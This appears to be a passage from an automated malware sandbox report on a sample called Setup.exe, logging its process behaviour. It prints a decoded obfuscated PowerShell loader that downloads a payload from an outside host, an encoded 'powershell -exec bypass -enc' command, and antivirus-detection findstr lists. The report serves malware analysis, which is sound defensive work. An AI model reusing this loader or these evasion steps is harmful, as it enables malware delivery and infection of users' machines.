      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 594187Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6593Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3208Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2863Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1372Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 595Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.com TID: 7288Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3020Thread sleep count: 6593 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep count: 3208 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep count: 2863 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep count: 1372 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6156Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2000Thread sleep count: 595 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6156Thread sleep time: -594187s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 594187Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\189943Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\189943\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: powershell.exe, 00000013.00000002.3537833898.0000000008611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Encrypted powershell cmdline option found
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: Base64 decoded $xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx = { Start-Sleep -Seconds 3 [System.Net.WebRequest]::Create("https://www.360.net").GetResponse().Close() Start-Sleep -Seconds 1 [System.Net.WebRequest]::Create("https://www.baidu.com").GetResponse().Close() Start-Sleep -Seconds 1 $lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = "https://klipcatepiu0.shop/int_clp_sha.txt" $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = New-Object System.Net.WebClient $lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.DownloadData($lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll) $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = New-Object System.IO.MemoryStream $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.Write($lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll, 0, $lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.Length) $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.Seek(0, [System.IO.SeekOrigin]::Begin) $lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = [System.Guid]::NewGuid().ToString() $xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx = [System.IO.Path]::Combine($env:LOCALAPP
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: Base64 decoded $xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx = { Start-Sleep -Seconds 3 [System.Net.WebRequest]::Create("https://www.360.net").GetResponse().Close() Start-Sleep -Seconds 1 [System.Net.WebRequest]::Create("https://www.baidu.com").GetResponse().Close() Start-Sleep -Seconds 1 $lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = "https://klipcatepiu0.shop/int_clp_sha.txt" $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = New-Object System.Net.WebClient $lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.DownloadData($lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll) $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = New-Object System.IO.MemoryStream $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.Write($lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll, 0, $lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.Length) $llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.Seek(0, [System.IO.SeekOrigin]::Begin) $lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = [System.Guid]::NewGuid().ToString() $xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx = [System.IO.Path]::Combine($env:LOCALAPPJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Nevertheless Nevertheless.cmd && Nevertheless.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 189943Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ExpendituresReactionsRioWinterDialReducedPricingSoftware" Dennis Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Handbook + ..\Attorneys + ..\Celebration + ..\Advert + ..\Loop + ..\Objectives + ..\Added XJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\189943\Attachment.com Attachment.com XJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -enc jab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4acaapqagahsacgagacaaiaagafmadabhahiadaatafmabablaguacaagac0auwblagmabwbuagqacwagadmacgakacaaiaagacaawwbtahkacwb0aguabqauae4azqb0ac4avwblagiaugblaheadqblahmadabdadoaogbdahiazqbhahqazqaoaciaaab0ahqacabzadoalwavahcadwb3ac4amwa2adaalgbuaguadaaiackalgbhaguadabsaguacwbwag8abgbzaguakaapac4aqwbsag8acwblacgakqakaaoaiaagacaaiabtahqayqbyahqalqbtagwazqblahaaiaatafmazqbjag8abgbkahmaiaaxaaoacgagacaaiaagafsauwb5ahmadablag0algboaguadaauafcazqbiafiazqbxahuazqbzahqaxqa6adoaqwbyaguayqb0aguakaaiaggadab0ahaacwa6ac8alwb3ahcadwauagiayqbpagqadqauagmabwbtaciakqauaecazqb0afiazqbzahaabwbuahmazqaoackalgbdagwabwbzaguakaapaaoacgagacaaiaagafmadabhahiadaatafmabablaguacaagac0auwblagmabwbuagqacwagadeacgakacaaiaagacaajabsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaagad0aiaaiaggadab0ahaacwa6ac8alwbragwaaqbwagmayqb0aguacabpahuamaauahmaaabvahaalwbpag4adabfagmababwaf8acwboagealgb0ahgadaaiaaoaiaagacaaiaakagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0aaoaiaagacaaiaakagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaagad0aiaakagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaauaeqabwb3ag4ababvageazabeageadabhacgajabsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaapaaoacgagacaaiaagacqababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0acgagacaaiaagacqababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwalgbxahiaaqb0aguakaakagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaasacaamaasacaajabsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwab
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -enc jab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4ahgaeab4acaapqagahsacgagacaaiaagafmadabhahiadaatafmabablaguacaagac0auwblagmabwbuagqacwagadmacgakacaaiaagacaawwbtahkacwb0aguabqauae4azqb0ac4avwblagiaugblaheadqblahmadabdadoaogbdahiazqbhahqazqaoaciaaab0ahqacabzadoalwavahcadwb3ac4amwa2adaalgbuaguadaaiackalgbhaguadabsaguacwbwag8abgbzaguakaapac4aqwbsag8acwblacgakqakaaoaiaagacaaiabtahqayqbyahqalqbtagwazqblahaaiaatafmazqbjag8abgbkahmaiaaxaaoacgagacaaiaagafsauwb5ahmadablag0algboaguadaauafcazqbiafiazqbxahuazqbzahqaxqa6adoaqwbyaguayqb0aguakaaiaggadab0ahaacwa6ac8alwb3ahcadwauagiayqbpagqadqauagmabwbtaciakqauaecazqb0afiazqbzahaabwbuahmazqaoackalgbdagwabwbzaguakaapaaoacgagacaaiaagafmadabhahiadaatafmabablaguacaagac0auwblagmabwbuagqacwagadeacgakacaaiaagacaajabsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaagad0aiaaiaggadab0ahaacwa6ac8alwbragwaaqbwagmayqb0aguacabpahuamaauahmaaabvahaalwbpag4adabfagmababwaf8acwboagealgb0ahgadaaiaaoaiaagacaaiaakagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0aaoaiaagacaaiaakagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaagad0aiaakagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwa